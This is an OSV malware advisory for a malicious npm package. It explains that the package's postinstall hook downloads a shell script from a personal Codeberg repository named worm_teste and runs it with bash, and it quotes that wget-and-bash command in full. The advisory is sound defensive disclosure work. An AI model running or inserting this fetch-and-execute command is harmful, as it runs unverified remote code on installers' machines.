OSV ID
MAL-2026-6594
Ecosystem
npm
Summary
package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/worm_teste/raw/branch/main/down_procwork.sh -O d.sh; bash d.sh , downloading a shell script from a mutable branch of an unrelated personal Codeberg repository named worm_teste and executing it via bash on the installer's machine at npm install time. The fetched script is unpinned (mutable main branch), unverified (no hash/signature check), and from a destination that bears no relationship to any declared package purpose — the source repository name itself indicates worm/propagation testing. Whatever bytes the repository owner serves at fetch time execute with the privileges of the user running npm install . The package additionally declares a self-referential dependency ( vkzmn: ^1.0.4 ), consistent with propagation scaffolding rather than a legitimate library.
Source: amazon-inspector (dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.